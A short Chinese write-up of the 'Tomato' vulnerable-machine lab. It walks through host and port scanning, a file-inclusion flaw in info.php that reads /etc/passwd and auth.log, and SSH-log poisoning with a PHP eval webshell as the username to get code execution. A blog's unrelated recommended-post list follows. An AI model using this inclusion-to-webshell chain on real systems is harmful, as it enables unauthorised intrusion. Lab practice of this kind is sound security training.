Tomato靶机攻略

将tomato改为NAT模式

扫描ip

arp-scan -l

扫描端口,发现ssh服务端口从22改为2211

扫描目录

发现http://192.168.31.134/antibot_image/ 访问

查看所有php文件的源码,看看有什么不同的地方

在info.php的源码中发现问题

在输入后,成功显示,说明文件包含漏洞

info.php?image=/etc/passwd

通过/var/log/auth.log这个在linux中使用的日志文件,成功查看到日志

info.php?image=/var/log/auth.log

使用ssh登录,看日志里会不会出现记录

发现日志中有记录

使用kali,让一句话木马写入日志中

ssh '<?php @eval($_POST[1]);?>'@192.168.31.134 -p 2211,

我的kali写入失败,选择用xshell连接

之后点击连接,当然肯定会失败,日志记录了就可以

使用中国蚁剑连接

相关推荐
_下雨天.2 分钟前
Python 网络编程
开发语言·网络·python
一只小鱼儿吖4 分钟前
长效代理IP:构建稳定高效的网络数据通
网络·网络协议·tcp/ip
STATICHIT静砸9 分钟前
了解Monorepo结构
前端
charlie11451419113 分钟前
嵌入式Linux模块学习——insmod 底层全流程解剖:从用户命令到内核内存
linux·c·嵌入式linux
Bert.Cai20 分钟前
Linux cat命令详解
linux·运维
星光不问赶路人21 分钟前
Node.js 如何判断入口文件:从 require.main 到 ES Module 实现
前端·node.js
xcLeigh25 分钟前
KES数据库表空间目录自动创建特性详解与存储运维最佳实践
大数据·运维·服务器·数据库·表空间·存储
Hello--_--World31 分钟前
Vue2的 双端 diff算法 与 Vue3 的 快速diff 算法
前端·vue.js·算法
零二年的冬31 分钟前
epoll详解
java·linux·开发语言·c++·链表